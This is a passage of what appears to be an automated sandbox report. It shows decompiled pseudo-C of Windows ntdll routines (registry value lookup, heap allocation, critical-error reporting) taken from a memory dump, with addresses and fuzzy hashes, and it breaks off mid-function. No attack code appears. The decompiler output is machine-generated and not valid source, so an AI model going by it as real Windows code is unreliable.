				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01629650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01604620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01629650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                0x01663893
                                                0x01663896
                                                0x01663899
                                                0x0166389f
                                                0x016638a0
                                                0x016638a4
                                                0x016638a9
                                                0x016638ac
                                                0x016638ad
                                                0x016638ae
                                                0x016638af
                                                0x016638b1
                                                0x016638b4
                                                0x016638bb
                                                0x016638bc
                                                0x016638bd
                                                0x016638c4
                                                0x016638c8
                                                0x016638ca
                                                0x016638ca
                                                0x016638d5
                                                0x0166393e
                                                0x01663940
                                                0x01663942
                                                0x01663952
                                                0x01663954
                                                0x01663961
                                                0x01663961
                                                0x01663967
                                                0x0166396e
                                                0x0166396e
                                                0x01663947
                                                0x0166394c
                                                0x00000000
                                                0x0166394c
                                                0x016638ea
                                                0x016638ee
                                                0x016638f8
                                                0x016638f9
                                                0x016638ff
                                                0x01663900
                                                0x01663902
                                                0x01663903
                                                0x0166390b
                                                0x0166390f
                                                0x01663950
                                                0x00000000
                                                0x01663950
                                                0x01663915
                                                0x0166391d
                                                0x0166391d
                                                0x01663922
                                                0x01663926
                                                0x00000000
                                                0x01663928
                                                0x0166392b
                                                0x0166392b
                                                0x01663935
                                                0x01663937
                                                0x01663937
                                                0x00000000
                                                0x01663935
                                                0x01663926
                                                0x016638f0
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 793a0e336d241bcc5d727c0d93bd9a5b87372303d280990272a5f89d1d5252d5
                                                • Instruction ID: 6b69f6f987adeb7a63abb36bac46f59f42d76660658747e20a4762eda25e3f29
                                                • Opcode Fuzzy Hash: 793a0e336d241bcc5d727c0d93bd9a5b87372303d280990272a5f89d1d5252d5
                                                • Instruction Fuzzy Hash: 2631E832D0051AAFEB15DA59CD45E7BB7B9FB90720F014269E918A7351E7309E00CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 33%
                                                			E0161D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x16dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01604120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0162B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E016298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E016295D0();
					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                0x0161d29c
                                                0x0161d2a6
                                                0x0161d2b1
                                                0x0161d2b5
                                                0x0161d2b6
                                                0x0161d2bc
                                                0x0161d2bd
                                                0x0161d2be
                                                0x0161d2bf
                                                0x0161d2c2
                                                0x0161d2c4
                                                0x0161d2cc
                                                0x0161d384
                                                0x0161d34b
                                                0x0161d34f
                                                0x0161d350
                                                0x0161d351
                                                0x0161d35c
                                                0x0161d35c
                                                0x0161d2d6
                                                0x0161d2da
                                                0x0161d2e1
                                                0x0161d361
                                                0x0161d369
                                                0x0161d36d
                                                0x0161d2e3
                                                0x0161d2e3
                                                0x0161d2e3
                                                0x0161d2e5
                                                0x0161d2ed
                                                0x0161d2f5
                                                0x0161d2fa
                                                0x0161d302
                                                0x0161d303
                                                0x0161d30b
                                                0x0161d30f
                                                0x0161d313
                                                0x0161d318
                                                0x0161d31c
                                                0x0161d320
                                                0x0161d379
                                                0x0161d37d
                                                0x00000000
                                                0x00000000
                                                0x0165affe
                                                0x0165b001
                                                0x0165b011
                                                0x00000000
                                                0x0161d322
                                                0x0161d322
                                                0x0161d330
                                                0x0161d337
                                                0x0161d35d
                                                0x0161d339
                                                0x0161d33f
                                                0x0161d38c
                                                0x0161d38c
                                                0x0161d33f
                                                0x0161d349
                                                0x00000000
                                                0x0161d349

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: b71fa07aa14e2ea32881dde51b110d5d76447ad45b87a5e856650cc4e1f1a112
                                                • Instruction ID: f2e7d377dc9ee44b647b6d310f630f82c8e7278e264e2fb055006a1f248f7b7f
                                                • Opcode Fuzzy Hash: b71fa07aa14e2ea32881dde51b110d5d76447ad45b87a5e856650cc4e1f1a112
                                                • Instruction Fuzzy Hash: A731BFB1548305AFC321DF68CD8496BBBE8EB8A754F080A2EF99483350D735DD05CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015F1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E015F1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0162BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0162A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0162A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01604620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                0x015f1b8f
                                                0x015f1b9a
                                                0x015f1b9c
                                                0x015f1b9e
                                                0x015f1ba3
                                                0x01647010
                                                0x01647010
                                                0x00000000
                                                0x015f1ba9
                                                0x015f1ba9
                                                0x015f1bae
                                                0x00000000
                                                0x015f1bc5
                                                0x015f1bca
                                                0x015f1bcf
                                                0x015f1bd0
                                                0x015f1bd1
                                                0x015f1bd2
                                                0x015f1bd6
                                                0x015f1bdc
                                                0x015f1be0
                                                0x01646ffc
                                                0x01647000
                                                0x00000000
                                                0x01647006
                                                0x01647009
                                                0x01647009
                                                0x015f1be6
                                                0x015f1bec
                                                0x015f1c0b
                                                0x015f1c0b
                                                0x015f1c0c
                                                0x015f1c11
                                                0x015f1c12
                                                0x015f1c15
                                                0x015f1c1b
                                                0x015f1c1f
                                                0x015f1c31
                                                0x015f1c33
                                                0x01647026
                                                0x01647026
                                                0x015f1c21
                                                0x015f1c24
                                                0x015f1c24
                                                0x015f1bee
                                                0x015f1bee
                                                0x015f1bf2
                                                0x015f1c3a
                                                0x015f1bf4
                                                0x015f1bf4
                                                0x015f1c05
                                                0x015f1c05
                                                0x015f1c09
                                                0x015f1c3e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015f1c09
                                                0x015f1bec
                                                0x015f1be0
                                                0x015f1bae
                                                0x015f1c2e

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: WindowsExcludedProcs
                                                • API String ID: 0-3583428290
                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction ID: e3c3c860bd2baa3d9b19aae3ae22fa4a0a28ef345fe3b07081b8ce07f2697de7
                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction Fuzzy Hash: 2321C876501929EBDB229A59CC80F5F7BADFF41A50F054829FB049F200D731DD00DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0160F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0160F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                0x0160f71d
                                                0x0160f722
                                                0x0160f726
                                                0x01654770
                                                0x0160f765
                                                0x0160f769
                                                0x0160f769
                                                0x0160f732
                                                0x0165477a
                                                0x00000000
                                                0x0165477a
                                                0x0160f738
                                                0x0160f73a
                                                0x0160f73c
                                                0x0160f73f
                                                0x0160f746
                                                0x0160f778
                                                0x0160f7a9
                                                0x0160f7a9
                                                0x0160f754
                                                0x0160f75a
                                                0x0160f75d
                                                0x0160f75f
                                                0x0160f761
                                                0x0160f76f
                                                0x0160f771
                                                0x0160f771
                                                0x0160f76f
                                                0x0160f763
                                                0x00000000
                                                0x0160f763
                                                0x0160f77d
                                                0x0160f7a3
                                                0x0160f7a5
                                                0x00000000
                                                0x0160f7a5
                                                0x0160f77f
                                                0x0160f782
                                                0x0160f784
                                                0x0160f786
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0160f788
                                                0x0160f748
                                                0x0160f74d
                                                0x0160f78d
                                                0x0160f793
                                                0x0160f7b7
                                                0x0160f7bc
                                                0x00000000
                                                0x0160f7bc
                                                0x0160f798
                                                0x00000000
                                                0x00000000
                                                0x0160f79d
                                                0x0160f7b0
                                                0x00000000
                                                0x0160f7b0
                                                0x0160f79f
                                                0x00000000
                                                0x0160f74f
                                                0x0160f74f
                                                0x00000000
                                                0x0160f74f

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                • Opcode ID: d8cbf09dd9a70c76e8bc3fd43cc54ed811cc5e3472aacc6a88ddf52d200c64ed
                                                • Instruction ID: b17116c72c8aeedb1b1da460a03fb764ee2a7c5436a52c0c9146ad56e0ccdb3e
                                                • Opcode Fuzzy Hash: d8cbf09dd9a70c76e8bc3fd43cc54ed811cc5e3472aacc6a88ddf52d200c64ed
                                                • Instruction Fuzzy Hash: 1C1190353086028BEB3F8E1DAC9073777D5EB95624F2445AAE961CB3D1EBB0C8428343
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01698DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E01698DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x16c0d50);
				E0163D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01675720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0163DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0163DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0163D130(_t34, _t39, _t40);
			}





                                                0x01698df1
                                                0x01698df1
                                                0x01698df1
                                                0x01698df1
                                                0x01698df1
                                                0x01698df1
                                                0x01698df3
                                                0x01698df8
                                                0x01698dfd
                                                0x01698e00
                                                0x01698e0e
                                                0x01698e2a
                                                0x01698e36
                                                0x01698e38
                                                0x01698e3c
                                                0x01698e46
                                                0x01698e46
                                                0x01698e36
                                                0x01698e50
                                                0x01698e56
                                                0x01698e59
                                                0x01698e5c
                                                0x01698e60
                                                0x01698e67
                                                0x01698e6d
                                                0x01698e73
                                                0x01698e74
                                                0x01698eb1
                                                0x01698ebd

                                                Strings
                                                • Critical error detected %lx, xrefs: 01698E21
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Critical error detected %lx
                                                • API String ID: 0-802127002
                                                • Opcode ID: 9659fb9a4edba4de196667907c5e2db0ccc6d9bbf937e977239ae3291afdc5e9
                                                • Instruction ID: a93c55f07c4133fe76d5d705e33368f67235249d6a4ff37f1e02d7a94901e1a6
                                                • Opcode Fuzzy Hash: 9659fb9a4edba4de196667907c5e2db0ccc6d9bbf937e977239ae3291afdc5e9
                                                • Instruction Fuzzy Hash: CA1187B5D00348DBDF24CFB889057ACBBB9BB45311F20425EE129AB382C3340602CF18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                Download Yara Rule
                                                Strings
                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0167FF60
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                • API String ID: 0-1911121157
                                                • Opcode ID: d78d3a8dec1960445d0678b8779784ff72b125cdc6d9d0dc0491b33148c582e0
                                                • Instruction ID: 7ef60c539f26a3b954aaeb5130b56023f93ea38c5d94b3300a84eaad6b927f59
                                                • Opcode Fuzzy Hash: d78d3a8dec1960445d0678b8779784ff72b125cdc6d9d0dc0491b33148c582e0
                                                • Instruction Fuzzy Hash: 75112671910544EFDB22EF58CD48FA8BBB2FF04715F548088F1055B261CB3D9950CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016B5BA5, Relevance: .6, Instructions: 592COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E016B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x16c1178);
				E0163D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E016B4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0162D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E016B5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x16d60e8;
								if( *0x16d60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x16d60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01629710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01626DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
